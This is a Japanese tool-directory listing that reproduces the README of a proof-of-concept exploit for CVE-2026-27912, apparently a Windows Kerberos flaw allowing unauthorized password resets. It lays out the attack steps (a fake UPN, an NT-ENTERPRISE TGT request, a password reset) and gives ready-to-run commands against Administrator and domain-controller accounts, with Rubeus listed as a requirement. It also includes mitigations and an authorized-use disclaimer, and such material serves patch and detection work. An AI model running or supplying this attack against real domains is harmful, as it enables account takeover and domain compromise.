Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Kerberos-CVE-2026-27912 — CVE-2026-27912 のPoC - Windows Kerberos の特権昇格 (ResetNightmare)。Kerberos の脆弱性を介した不正なパスワードリセット。セキュリティ研究のみを目的としています。 | Kitploit
ツール/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
認証と認可特権昇格パスワード攻撃エクスプロイトペネトレーションテスト
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

CVE-2026-27912 のPoC - Windows Kerberos の特権昇格 (ResetNightmare)。Kerberos の脆弱性を介した不正なパスワードリセット。セキュリティ研究のみを目的としています。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
4311ヶ月前未レビュー

Kerberos-CVE-2026-27912

CVE-2026-27912 - Windows Kerberos 特権昇格の脆弱性

ResetNightmare - Kerberos パスワード変更プロトコルの欠陥による不正なパスワードリセット


📋 詳細

項目値
CVECVE-2026-27912
タイトルWindows Kerberos 特権昇格の脆弱性
CVSS8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: 不適切な認可
公開日2026年4月14日
パッチ適用日2026年4月

🔍 攻撃フロー

1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 必要条件

  • PowerShell が利用可能な Windows
  • ActiveDirectory モジュール (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (GhostPack/Rubeus からダウンロード)
  • ドメインコントローラーへのネットワークアクセス

🚀 インストール

# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 使い方

基本攻撃

python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

コンピューターアカウントを標的にする場合

python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

新しいアカウントを作成する

python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

詳細モード

python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 引数

フラグ説明デフォルト
-t / --target対象アカウント名必須
-p / --new-password対象アカウントの新しいパスワード必須
-u / --upn-user偽のUPNを設定するアカウント必須
-up / --upn-passwordUPNアカウントのパスワード必須
-c / --computerUPNUserがコンピューターアカウントである場合フラグ
-r / --rubeus-pathRubeus.exeへのパスRubeus.exe
-e / --encryption対応する暗号化の種類AES256
-path / --create-path新しいアカウントを作成するOUパス""
-d / --dcドメインコントローラー名自動検出
-v / --verbose詳細な出力フラグ

🛡️ 緩和策

  1. Microsoft セキュリティ更新プログラムの公式パッチを適用する
  2. ネットワークをセグメント化する - 隣接ネットワークからのアクセスを制限する
  3. 最小権限の原則を徹底する - UPN書き込み権限を制限する
  4. 不審なUPN変更やパスワードリセットを監視する

⚠️ 免責事項

認可されたセキュリティテストおよび教育研究目的に限ります。

コンピューターシステムへの不正アクセスは違法です。作者は本ソフトウェアの誤用について一切責任を負いません。


📚 参考

  • NVD: CVE-2026-27912
  • Microsoft Security Update Guide

👨‍💻 作者

n0vax1337 / セキュリティリサーチャー


📄 ライセンス

MIT License - LICENSE を参照


最終更新日: 2026

ツールをダウンロード